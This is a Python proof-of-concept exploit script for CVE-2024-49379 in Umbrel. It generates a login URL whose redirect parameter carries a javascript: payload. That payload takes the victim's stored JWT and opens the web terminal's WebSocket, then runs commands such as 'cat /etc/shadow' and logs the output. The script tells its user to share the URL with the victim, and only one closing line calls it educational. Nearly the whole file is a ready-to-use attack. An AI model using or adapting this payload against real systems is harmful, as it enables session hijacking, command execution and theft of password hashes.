import urllib.parse

# ASCII Banner
def print_banner():
    banner = """
     _____  _____   _____   _____        _____  
    |  __ \|  __ \ / ____| |_   _|      |  __ \ 
    | |__) | |__) | (___     | |  _ __  | |__) |
    |  ___/|  _  / \___ \    | | | '_ \ |  ___/ 
    | |    | | \ \ ____) |  _| |_| | | || |     
    |_|    |_|  \_\_____/  |_____|_| |_||_|     
    """
    print(banner)
    print("PoC for CVE-2024-49379\n")
    print("Discovered by Peter Stöckli (@p-) and the GitHub Security Lab team.")
    print("PoC moved to Python for convenience in generation by S1REN.\n")

# Target configuration
target_url = "http://umbrel.local/login"

# Enhanced payload for robust exploitation
payload = (
    "javascript:(function()%7B"
    "let%20x%20=%20new%20WebSocket('ws://umbrel.local/terminal?appId=&rows=24&cols=80&token='"
    ".concat(window.localStorage.getItem('jwt')));"
    "x.addEventListener('open',%20(e)%20=>%20%7B"
    "x.send('echo%20Exploitation%20Started%20>%20/tmp/attack.log\\n');"
    "x.send('uname%20-a%20>>%20/tmp/attack.log\\n');"
    "x.send('id%20>>%20/tmp/attack.log\\n');"
    "x.send('cat%20/etc/shadow%20>>%20/tmp/attack.log\\n');"
    "x.send('echo%20Exploitation%20Complete%20>>%20/tmp/attack.log\\n');"
    "%7D);"
    "%7D)();"
)

def generate_malicious_url(base_url, injected_payload):
    """
    Generate a URL with a malicious redirect parameter.
    """
    params = {"redirect": injected_payload}
    return f"{base_url}?{urllib.parse.urlencode(params)}"

if __name__ == "__main__":
    # Print banner and shout-out
    print_banner()

    # Generate malicious URL
    malicious_url = generate_malicious_url(target_url, payload)
    print("[*] Share the following URL with the victim:")
    print(malicious_url)
    print("\n[*] Remember: This PoC is for educational and authorized testing purposes only.")